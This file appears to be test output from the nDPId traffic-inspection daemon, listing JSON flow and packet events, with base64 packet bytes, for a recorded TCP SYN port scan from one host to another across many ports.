+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs10IAADEGQDCsEAAIQA2GNIzSABjdUoMYAAAAAGACCAAwdwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs6Q8AADcGKGOsEAAIQA2GNIzSE+3dUoMYAAAAAGACEAAUogAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsa+QAADkGo46sEAAIQA2GNIzSBRDdUoMYAAAAAGACCAArfwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqBkAAC8GcVmsEAAIQA2GNIzSI47dUoMYAAAAAGACEAAFAQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHIAACwGdACsEAAIQA2GNIzTJr3dU4MZAAAAAGACBAANzwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAstK4AADUGXsSsEAAIQA2GNIzTBR\/dU4MZAAAAAGACCAArbQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsP4IAACcG4fCsEAAIQA2GNIzTBN\/dU4MZAAAAAGACEAAjrQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAstAIAAC8GZXCsEAAIQA2GNIzTOGrdU4MZAAAAAGACEADwIQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsyLAAADoGRcKsEAAIQA2GNIzTHfzdU4MZAAAAAGACDAAOkAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsFmcAAC4GBAysEAAIQA2GNIzThGvdU4MZAAAAAGACDACoIAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsv88AADcGUaOsEAAIQA2GNIzTD6PdU4MZAAAAAGACEAAY6QAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsFdcAACkGCZysEAAIQA2GNIzTBCvdU4MZAAAAAGACCAAsYQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAspR4AACUGflSsEAAIQA2GNIzTFw\/dU4MZAAAAAGACCAAZfQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsZasAADQGrsesEAAIQA2GNIzTI\/DdU4MZAAAAAGACBAAQnAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsAYwAADEGFeesEAAIQA2GNIzTB9XdU4MZAAAAAGACCAAotwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsECUAACcGEU6sEAAIQA2GNIzTA0vdU4MZAAAAAGACEAAlQQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsXIoAADgGs+isEAAIQA2GNIzTCo3dU4MZAAAAAGACBAAp\/wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058156,"pkt":"ACYLMQczACWzv5HuCABFAAAsG+YAACwGAI2sEAAIQA2GNIzTBRTdU4MZAAAAAGACBAAveAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058156,"pkt":"ACYLMQczACWzv5HuCABFAAAsNr8AACkG6LOsEAAIQA2GNIzTBDPdU4MZAAAAAGACCAAsWQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs4koAACcGPyisEAAIQA2GNIzTI47dU4MZAAAAAGACEAAE\/gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs28oAADsGMaisEAAIQA2GNIzTBRDdU4MZAAAAAGACEAAjfAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsncwAAC0GfaasEAAIQA2GNIzTE+3dU4MZAAAAAGACCAAcnwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsnGIAACgGhBCsEAAIQA2GNIzTABjdU4MZAAAAAGACBAA0dAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs8\/oAACkGK3isEAAIQA2GNIzTznDdU4MZAAAAAGACCABiGwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
